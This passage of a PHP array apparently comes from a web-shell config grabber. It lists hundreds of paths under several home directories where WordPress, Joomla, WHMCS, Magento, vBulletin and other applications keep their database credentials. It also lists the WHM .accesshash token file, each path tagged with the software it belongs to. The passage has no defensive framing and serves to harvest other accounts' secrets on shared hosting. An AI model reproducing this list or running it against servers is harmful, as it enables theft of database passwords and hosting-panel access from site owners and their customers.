"/home3/$user_x140/public_html/application/config/database.php" => "Ellislab",
"/home3/$user_x140/public_html/vb/includes/config.php" => "Vbulletin",
"/home3/$user_x140/public_html/includes/config.php" => "Vbulletin",
"/home3/$user_x140/public_html/forum/includes/config.php" => "Vbulletin",
"/home3/$user_x140/public_html/forums/includes/config.php" => "Vbulletin",
"/home3/$user_x140/public_html/cc/includes/config.php" => "Vbulletin",
"/home3/$user_x140/public_html/inc/config.php" => "MyBB",
"/home3/$user_x140/public_html/includes/configure.php" => "OsCommerce",
"/home3/$user_x140/public_html/shop/includes/configure.php" => "OsCommerce",
"/home3/$user_x140/public_html/os/includes/configure.php" => "OsCommerce",
"/home3/$user_x140/public_html/oscom/includes/configure.php" => "OsCommerce",
"/home3/$user_x140/public_html/products/includes/configure.php" => "OsCommerce",
"/home3/$user_x140/public_html/cart/includes/configure.php" => "OsCommerce",
"/home3/$user_x140/public_html/inc/conf_global.php" => "IPB",
"/home3/$user_x140/public_html/wp-config.php" => "Wordpress",
"/home3/$user_x140/public_html/wp/test/wp-config.php" => "Wordpress",
"/home3/$user_x140/public_html/blog/wp-config.php" => "Wordpress",
"/home3/$user_x140/public_html/beta/wp-config.php" => "Wordpress",
"/home3/$user_x140/public_html/portal/wp-config.php" => "Wordpress",
"/home3/$user_x140/public_html/site/wp-config.php" => "Wordpress",
"/home3/$user_x140/public_html/wp/wp-config.php" => "Wordpress",
"/home3/$user_x140/public_html/WP/wp-config.php" => "Wordpress",
"/home3/$user_x140/public_html/news/wp-config.php" => "Wordpress",
"/home3/$user_x140/public_html/wordpress/wp-config.php" => "Wordpress",
"/home3/$user_x140/public_html/test/wp-config.php" => "Wordpress",
"/home3/$user_x140/public_html/demo/wp-config.php" => "Wordpress",
"/home3/$user_x140/public_html/home3/wp-config.php" => "Wordpress",
"/home3/$user_x140/public_html/v1/wp-config.php" => "Wordpress",
"/home3/$user_x140/public_html/v2/wp-config.php" => "Wordpress",
"/home3/$user_x140/public_html/press/wp-config.php" => "Wordpress",
"/home3/$user_x140/public_html/new/wp-config.php" => "Wordpress",
"/home3/$user_x140/public_html/blogs/wp-config.php" => "Wordpress",
"/home3/$user_x140/public_html/configuration.php" => "Joomla",
"/home3/$user_x140/public_html/blog/configuration.php" => "Joomla",
"/home3/$user_x140/public_html/submitticket.php" => "^WHMCS",
"/home3/$user_x140/public_html/cms/configuration.php" => "Joomla",
"/home3/$user_x140/public_html/beta/configuration.php" => "Joomla",
"/home3/$user_x140/public_html/portal/configuration.php" => "Joomla",
"/home3/$user_x140/public_html/site/configuration.php" => "Joomla",
"/home3/$user_x140/public_html/main/configuration.php" => "Joomla",
"/home3/$user_x140/public_html/home3/configuration.php" => "Joomla",
"/home3/$user_x140/public_html/demo/configuration.php" => "Joomla",
"/home3/$user_x140/public_html/test/configuration.php" => "Joomla",
"/home3/$user_x140/public_html/v1/configuration.php" => "Joomla",
"/home3/$user_x140/public_html/v2/configuration.php" => "Joomla",
"/home3/$user_x140/public_html/joomla/configuration.php" => "Joomla",
"/home3/$user_x140/public_html/new/configuration.php" => "Joomla",
"/home3/$user_x140/public_html/WHMCS/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/whmcs1/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Whmcs/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/whmcs/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/whmcs/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/WHMC/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Whmc/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/whmc/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/WHM/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Whm/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/whm/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/HOST/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Host/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/host/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/SUPPORTES/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Supportes/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/supportes/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/domains/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/domain/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Hosting/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/HOSTING/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/hosting/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/CART/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Cart/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/cart/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/ORDER/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Order/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/order/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/CLIENT/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Client/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/client/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Clientarea/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/clientarea/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/SUPPORT/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Support/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/support/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/BILLING/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Billing/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/billing/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/BUY/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Buy/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/buy/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/MANAGE/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Manage/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/manage/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/ClientSupport/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Clientsupport/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/clientsupport/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/CHECKOUT/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Checkout/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/checkout/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/BILLINGS/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Billings/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/billings/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/BASKET/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Basket/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/basket/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/SECURE/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Secure/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/secure/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/SALES/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Sales/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/sales/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/BILL/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Bill/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/bill/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/PURCHASE/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Purchase/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/purchase/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/ACCOUNT/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Account/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/account/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/USER/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/User/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/user/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/CLIENTS/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Clients/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/clients/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/BILLINGS/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/Billings/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/billings/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/MY/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/My/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/my/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/secure/whm/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/secure/whmcs/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/panel/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/clientes/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/cliente/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/support/order/submitticket.php" => "WHMCS",
"/home3/$user_x140/public_html/bb-config.php" => "BoxBilling",
"/home3/$user_x140/public_html/boxbilling/bb-config.php" => "BoxBilling",
"/home3/$user_x140/public_html/box/bb-config.php" => "BoxBilling",
"/home3/$user_x140/public_html/host/bb-config.php" => "BoxBilling",
"/home3/$user_x140/public_html/Host/bb-config.php" => "BoxBilling",
"/home3/$user_x140/public_html/supportes/bb-config.php" => "BoxBilling",
"/home3/$user_x140/public_html/support/bb-config.php" => "BoxBilling",
"/home3/$user_x140/public_html/hosting/bb-config.php" => "BoxBilling",
"/home3/$user_x140/public_html/cart/bb-config.php" => "BoxBilling",
"/home3/$user_x140/public_html/order/bb-config.php" => "BoxBilling",
"/home3/$user_x140/public_html/client/bb-config.php" => "BoxBilling",
"/home3/$user_x140/public_html/clients/bb-config.php" => "BoxBilling",
"/home3/$user_x140/public_html/cliente/bb-config.php" => "BoxBilling",
"/home3/$user_x140/public_html/clientes/bb-config.php" => "BoxBilling",
"/home3/$user_x140/public_html/billing/bb-config.php" => "BoxBilling",
"/home3/$user_x140/public_html/billings/bb-config.php" => "BoxBilling",
"/home3/$user_x140/public_html/my/bb-config.php" => "BoxBilling",
"/home3/$user_x140/public_html/secure/bb-config.php" => "BoxBilling",
"/home3/$user_x140/public_html/support/order/bb-config.php" => "BoxBilling",
"/home3/$user_x140/public_html/includes/dist-configure.php" => "Zencart",
"/home3/$user_x140/public_html/zencart/includes/dist-configure.php" => "Zencart",
"/home3/$user_x140/public_html/products/includes/dist-configure.php" => "Zencart",
"/home3/$user_x140/public_html/cart/includes/dist-configure.php" => "Zencart",
"/home3/$user_x140/public_html/shop/includes/dist-configure.php" => "Zencart",
"/home3/$user_x140/public_html/includes/iso4217.php" => "Hostbills",
"/home3/$user_x140/public_html/hostbills/includes/iso4217.php" => "Hostbills",
"/home3/$user_x140/public_html/host/includes/iso4217.php" => "Hostbills",
"/home3/$user_x140/public_html/Host/includes/iso4217.php" => "Hostbills",
"/home3/$user_x140/public_html/supportes/includes/iso4217.php" => "Hostbills",
"/home3/$user_x140/public_html/support/includes/iso4217.php" => "Hostbills",
"/home3/$user_x140/public_html/hosting/includes/iso4217.php" => "Hostbills",
"/home3/$user_x140/public_html/cart/includes/iso4217.php" => "Hostbills",
"/home3/$user_x140/public_html/order/includes/iso4217.php" => "Hostbills",
"/home3/$user_x140/public_html/client/includes/iso4217.php" => "Hostbills",
"/home3/$user_x140/public_html/clients/includes/iso4217.php" => "Hostbills",
"/home3/$user_x140/public_html/cliente/includes/iso4217.php" => "Hostbills",
"/home3/$user_x140/public_html/clientes/includes/iso4217.php" => "Hostbills",
"/home3/$user_x140/public_html/billing/includes/iso4217.php" => "Hostbills",
"/home3/$user_x140/public_html/billings/includes/iso4217.php" => "Hostbills",
"/home3/$user_x140/public_html/my/includes/iso4217.php" => "Hostbills",
"/home3/$user_x140/public_html/secure/includes/iso4217.php" => "Hostbills",
"/home3/$user_x140/public_html/support/order/includes/iso4217.php" => "Hostbills",
"/home4/$user_x140/.accesshash" => "WHM-accesshash",
"/home4/$user_x140/public_html/config/koneksi.php" => "Lokomedia",
"/home4/$user_x140/public_html/forum/config.php" => "phpBB",
"/home4/$user_x140/public_html/sites/default/settings.php" => "Drupal",
"/home4/$user_x140/public_html/config/settings.inc.php" => "PrestaShop",
"/home4/$user_x140/public_html/app/etc/local.xml" => "Magento",
"/home4/$user_x140/public_html/admin/config.php" => "OpenCart",
"/home4/$user_x140/public_html/application/config/database.php" => "Ellislab",
"/home4/$user_x140/public_html/vb/includes/config.php" => "Vbulletin",
"/home4/$user_x140/public_html/includes/config.php" => "Vbulletin",
"/home4/$user_x140/public_html/forum/includes/config.php" => "Vbulletin",
"/home4/$user_x140/public_html/forums/includes/config.php" => "Vbulletin",
"/home4/$user_x140/public_html/cc/includes/config.php" => "Vbulletin",
"/home4/$user_x140/public_html/inc/config.php" => "MyBB",
"/home4/$user_x140/public_html/includes/configure.php" => "OsCommerce",
"/home4/$user_x140/public_html/shop/includes/configure.php" => "OsCommerce",
"/home4/$user_x140/public_html/os/includes/configure.php" => "OsCommerce",
"/home4/$user_x140/public_html/oscom/includes/configure.php" => "OsCommerce",
"/home4/$user_x140/public_html/products/includes/configure.php" => "OsCommerce",
"/home4/$user_x140/public_html/cart/includes/configure.php" => "OsCommerce",
"/home4/$user_x140/public_html/inc/conf_global.php" => "IPB",
"/home4/$user_x140/public_html/wp-config.php" => "Wordpress",
"/home4/$user_x140/public_html/wp/test/wp-config.php" => "Wordpress",
"/home4/$user_x140/public_html/blog/wp-config.php" => "Wordpress",
"/home4/$user_x140/public_html/beta/wp-config.php" => "Wordpress",
"/home4/$user_x140/public_html/portal/wp-config.php" => "Wordpress",
"/home4/$user_x140/public_html/site/wp-config.php" => "Wordpress",
"/home4/$user_x140/public_html/wp/wp-config.php" => "Wordpress",
"/home4/$user_x140/public_html/WP/wp-config.php" => "Wordpress",
"/home4/$user_x140/public_html/news/wp-config.php" => "Wordpress",
"/home4/$user_x140/public_html/wordpress/wp-config.php" => "Wordpress",
"/home4/$user_x140/public_html/test/wp-config.php" => "Wordpress",
"/home4/$user_x140/public_html/demo/wp-config.php" => "Wordpress",
"/home4/$user_x140/public_html/home4/wp-config.php" => "Wordpress",
"/home4/$user_x140/public_html/v1/wp-config.php" => "Wordpress",
"/home4/$user_x140/public_html/v2/wp-config.php" => "Wordpress",
"/home4/$user_x140/public_html/press/wp-config.php" => "Wordpress",
"/home4/$user_x140/public_html/new/wp-config.php" => "Wordpress",
"/home4/$user_x140/public_html/blogs/wp-config.php" => "Wordpress",
"/home4/$user_x140/public_html/configuration.php" => "Joomla",
"/home4/$user_x140/public_html/blog/configuration.php" => "Joomla",
"/home4/$user_x140/public_html/submitticket.php" => "^WHMCS",
"/home4/$user_x140/public_html/cms/configuration.php" => "Joomla",
"/home4/$user_x140/public_html/beta/configuration.php" => "Joomla",
"/home4/$user_x140/public_html/portal/configuration.php" => "Joomla",
"/home4/$user_x140/public_html/site/configuration.php" => "Joomla",
"/home4/$user_x140/public_html/main/configuration.php" => "Joomla",
"/home4/$user_x140/public_html/home4/configuration.php" => "Joomla",
"/home4/$user_x140/public_html/demo/configuration.php" => "Joomla",
"/home4/$user_x140/public_html/test/configuration.php" => "Joomla",
"/home4/$user_x140/public_html/v1/configuration.php" => "Joomla",
"/home4/$user_x140/public_html/v2/configuration.php" => "Joomla",
"/home4/$user_x140/public_html/joomla/configuration.php" => "Joomla",
"/home4/$user_x140/public_html/new/configuration.php" => "Joomla",
"/home4/$user_x140/public_html/WHMCS/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/whmcs1/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Whmcs/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/whmcs/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/whmcs/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/WHMC/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Whmc/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/whmc/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/WHM/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Whm/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/whm/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/HOST/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Host/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/host/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/SUPPORTES/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Supportes/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/supportes/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/domains/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/domain/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Hosting/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/HOSTING/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/hosting/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/CART/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Cart/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/cart/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/ORDER/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Order/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/order/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/CLIENT/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Client/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/client/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Clientarea/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/clientarea/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/SUPPORT/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Support/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/support/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/BILLING/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Billing/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/billing/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/BUY/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Buy/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/buy/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/MANAGE/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Manage/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/manage/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/ClientSupport/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Clientsupport/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/clientsupport/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/CHECKOUT/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Checkout/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/checkout/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/BILLINGS/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Billings/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/billings/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/BASKET/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Basket/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/basket/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/SECURE/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Secure/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/secure/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/SALES/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Sales/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/sales/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/BILL/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Bill/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/bill/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/PURCHASE/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Purchase/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/purchase/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/ACCOUNT/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Account/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/account/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/USER/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/User/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/user/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/CLIENTS/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Clients/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/clients/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/BILLINGS/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/Billings/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/billings/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/MY/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/My/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/my/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/secure/whm/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/secure/whmcs/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/panel/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/clientes/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/cliente/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/support/order/submitticket.php" => "WHMCS",
"/home4/$user_x140/public_html/bb-config.php" => "BoxBilling",
"/home4/$user_x140/public_html/boxbilling/bb-config.php" => "BoxBilling",
"/home4/$user_x140/public_html/box/bb-config.php" => "BoxBilling",
"/home4/$user_x140/public_html/host/bb-config.php" => "BoxBilling",
"/home4/$user_x140/public_html/Host/bb-config.php" => "BoxBilling",
"/home4/$user_x140/public_html/supportes/bb-config.php" => "BoxBilling",
"/home4/$user_x140/public_html/support/bb-config.php" => "BoxBilling",
"/home4/$user_x140/public_html/hosting/bb-config.php" => "BoxBilling",
"/home4/$user_x140/public_html/cart/bb-config.php" => "BoxBilling",
"/home4/$user_x140/public_html/order/bb-config.php" => "BoxBilling",
"/home4/$user_x140/public_html/client/bb-config.php" => "BoxBilling",
"/home4/$user_x140/public_html/clients/bb-config.php" => "BoxBilling",
"/home4/$user_x140/public_html/cliente/bb-config.php" => "BoxBilling",
"/home4/$user_x140/public_html/clientes/bb-config.php" => "BoxBilling",
"/home4/$user_x140/public_html/billing/bb-config.php" => "BoxBilling",
"/home4/$user_x140/public_html/billings/bb-config.php" => "BoxBilling",
"/home4/$user_x140/public_html/my/bb-config.php" => "BoxBilling",
"/home4/$user_x140/public_html/secure/bb-config.php" => "BoxBilling",
"/home4/$user_x140/public_html/support/order/bb-config.php" => "BoxBilling",
"/home4/$user_x140/public_html/includes/dist-configure.php" => "Zencart",
"/home4/$user_x140/public_html/zencart/includes/dist-configure.php" => "Zencart",
"/home4/$user_x140/public_html/products/includes/dist-configure.php" => "Zencart",
"/home4/$user_x140/public_html/cart/includes/dist-configure.php" => "Zencart",
"/home4/$user_x140/public_html/shop/includes/dist-configure.php" => "Zencart",
"/home4/$user_x140/public_html/includes/iso4217.php" => "Hostbills",
"/home4/$user_x140/public_html/hostbills/includes/iso4217.php" => "Hostbills",
"/home4/$user_x140/public_html/host/includes/iso4217.php" => "Hostbills",
"/home4/$user_x140/public_html/Host/includes/iso4217.php" => "Hostbills",
"/home4/$user_x140/public_html/supportes/includes/iso4217.php" => "Hostbills",
"/home4/$user_x140/public_html/support/includes/iso4217.php" => "Hostbills",
"/home4/$user_x140/public_html/hosting/includes/iso4217.php" => "Hostbills",
"/home4/$user_x140/public_html/cart/includes/iso4217.php" => "Hostbills",
"/home4/$user_x140/public_html/order/includes/iso4217.php" => "Hostbills",
"/home4/$user_x140/public_html/client/includes/iso4217.php" => "Hostbills",
"/home4/$user_x140/public_html/clients/includes/iso4217.php" => "Hostbills",
"/home4/$user_x140/public_html/cliente/includes/iso4217.php" => "Hostbills",
"/home4/$user_x140/public_html/clientes/includes/iso4217.php" => "Hostbills",
"/home4/$user_x140/public_html/billing/includes/iso4217.php" => "Hostbills",
"/home4/$user_x140/public_html/billings/includes/iso4217.php" => "Hostbills",
"/home4/$user_x140/public_html/my/includes/iso4217.php" => "Hostbills",
"/home4/$user_x140/public_html/secure/includes/iso4217.php" => "Hostbills",
"/home4/$user_x140/public_html/support/order/includes/iso4217.php" => "Hostbills",
"/home5/$user_x140/.accesshash" => "WHM-accesshash",
"/home5/$user_x140/public_html/config/koneksi.php" => "Lokomedia",
"/home5/$user_x140/public_html/forum/config.php" => "phpBB",
"/home5/$user_x140/public_html/sites/default/settings.php" => "Drupal",
"/home5/$user_x140/public_html/config/settings.inc.php" => "PrestaShop",
"/home5/$user_x140/public_html/app/etc/local.xml" => "Magento",
"/home5/$user_x140/public_html/admin/config.php" => "OpenCart",
"/home5/$user_x140/public_html/application/config/database.php" => "Ellislab",
"/home5/$user_x140/public_html/vb/includes/config.php" => "Vbulletin",
"/home5/$user_x140/public_html/includes/config.php" => "Vbulletin",
"/home5/$user_x140/public_html/forum/includes/config.php" => "Vbulletin",
"/home5/$user_x140/public_html/forums/includes/config.php" => "Vbulletin",
"/home5/$user_x140/public_html/cc/includes/config.php" => "Vbulletin",
"/home5/$user_x140/public_html/inc/config.php" => "MyBB",
"/home5/$user_x140/public_html/includes/configure.php" => "OsCommerce",
"/home5/$user_x140/public_html/shop/includes/configure.php" => "OsCommerce",
"/home5/$user_x140/public_html/os/includes/configure.php" => "OsCommerce",
"/home5/$user_x140/public_html/oscom/includes/configure.php" => "OsCommerce",
"/home5/$user_x140/public_html/products/includes/configure.php" => "OsCommerce",
"/home5/$user_x140/public_html/cart/includes/configure.php" => "OsCommerce",
"/home5/$user_x140/public_html/inc/conf_global.php" => "IPB",
"/home5/$user_x140/public_html/wp-config.php" => "Wordpress",
"/home5/$user_x140/public_html/wp/test/wp-config.php" => "Wordpress",
"/home5/$user_x140/public_html/blog/wp-config.php" => "Wordpress",
"/home5/$user_x140/public_html/beta/wp-config.php" => "Wordpress",
"/home5/$user_x140/public_html/portal/wp-config.php" => "Wordpress",
"/home5/$user_x140/public_html/site/wp-config.php" => "Wordpress",
"/home5/$user_x140/public_html/wp/wp-config.php" => "Wordpress",
"/home5/$user_x140/public_html/WP/wp-config.php" => "Wordpress",
"/home5/$user_x140/public_html/news/wp-config.php" => "Wordpress",
"/home5/$user_x140/public_html/wordpress/wp-config.php" => "Wordpress",
"/home5/$user_x140/public_html/test/wp-config.php" => "Wordpress",
"/home5/$user_x140/public_html/demo/wp-config.php" => "Wordpress",
"/home5/$user_x140/public_html/home5/wp-config.php" => "Wordpress",
"/home5/$user_x140/public_html/v1/wp-config.php" => "Wordpress",
"/home5/$user_x140/public_html/v2/wp-config.php" => "Wordpress",
"/home5/$user_x140/public_html/press/wp-config.php" => "Wordpress",
"/home5/$user_x140/public_html/new/wp-config.php" => "Wordpress",
"/home5/$user_x140/public_html/blogs/wp-config.php" => "Wordpress",
"/home5/$user_x140/public_html/configuration.php" => "Joomla",
"/home5/$user_x140/public_html/blog/configuration.php" => "Joomla",
"/home5/$user_x140/public_html/submitticket.php" => "^WHMCS",
"/home5/$user_x140/public_html/cms/configuration.php" => "Joomla",
"/home5/$user_x140/public_html/beta/configuration.php" => "Joomla",
"/home5/$user_x140/public_html/portal/configuration.php" => "Joomla",
"/home5/$user_x140/public_html/site/configuration.php" => "Joomla",
"/home5/$user_x140/public_html/main/configuration.php" => "Joomla",
"/home5/$user_x140/public_html/home5/configuration.php" => "Joomla",
"/home5/$user_x140/public_html/demo/configuration.php" => "Joomla",
"/home5/$user_x140/public_html/test/configuration.php" => "Joomla",
"/home5/$user_x140/public_html/v1/configuration.php" => "Joomla",
"/home5/$user_x140/public_html/v2/configuration.php" => "Joomla",
"/home5/$user_x140/public_html/joomla/configuration.php" => "Joomla",
"/home5/$user_x140/public_html/new/configuration.php" => "Joomla",
"/home5/$user_x140/public_html/WHMCS/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/whmcs1/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Whmcs/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/whmcs/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/whmcs/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/WHMC/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/Whmc/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/whmc/submitticket.php" => "WHMCS",
"/home5/$user_x140/public_html/WHM/submitticket.php" => "WHMCS",
